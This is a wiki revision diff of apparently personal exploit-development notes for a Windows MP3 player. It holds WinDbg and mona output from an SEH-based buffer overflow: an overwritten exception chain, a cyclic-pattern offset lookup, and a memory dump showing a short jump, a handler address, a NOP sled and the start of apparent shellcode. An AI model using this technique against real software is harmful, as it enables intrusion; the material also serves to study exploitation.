User Tools

Site Tools


exploiting:windows:milleniump3:start

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

exploiting:windows:milleniump3:start [2019/08/10 21:11] – created ebaerexploiting:windows:milleniump3:start [2019/08/10 21:16] (current) ebaer
Line 4: Line 4:
 ===== Windbg/mona notes ===== ===== Windbg/mona notes =====
  
-<code>+<code bash>
 0:000> r 0:000> r
 eax=00185748 ebx=00185748 ecx=00000000 edx=46376846 esi=0018471c edi=0623c00c eax=00185748 ebx=00185748 ecx=00000000 edx=46376846 esi=0018471c edi=0623c00c
Line 18: Line 18:
 00185730: 68463068 00185730: 68463068
 Invalid exception stack at 46396746 Invalid exception stack at 46396746
- 
-0:000> db esp L30 
-00184708  30 38 40 00 48 57 18 00-00 00 00 00 c4 72 81 00  08@.HW.......r.. 
-00184718  0b f8 42 00 31 09 68 74-74 70 3a 2f 2f 41 61 30  ..B.1.http://Aa0 
-00184728  41 61 31 41 61 32 41 61-33 41 61 34 41 61 35 41  Aa1Aa2Aa3Aa4Aa5A 
  
 C:\_c\exploits>python pattern.py "Fg9F" C:\_c\exploits>python pattern.py "Fg9F"
Line 52: Line 47:
 0053:00000060  00000000 00000000 00000000 00000000 0053:00000060  00000000 00000000 00000000 00000000
 0053:00000070  00000000 00000000 00000000 00000000 0053:00000070  00000000 00000000 00000000 00000000
 +00185e7c 
 0:000> dp 00185e7c  0:000> dp 00185e7c 
-00185e7c  10014398 42424242 42424242 42424242 +00185e7c  1ceb9090 10014e98 90909090 90909090 
-00185e8c  42424242 42424242 00000000 42424242 +00185e8c  90909090 90909090 00000000 90909090 
-00185e9c  42424242 42424242 42424242 42424242 +00185e9c  90909090 ced99090 90fa2ebe 2474d9a0
-00185eac  42424242 42424242 42424242 42424242 +
-00185ebc  42424242 42424242 42424242 42424242 +
-00185ecc  42424242 42424242 42424242 42424242 +
-00185edc  42424242 42424242 42424242 42424242+
  
 +# some memo shortly after the seh chain is zeroed out -> jump over
 </code> </code>
  
exploiting/windows/milleniump3/start.1565464298.txt.gz · Last modified: 2019/08/10 21:11 by ebaer

Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki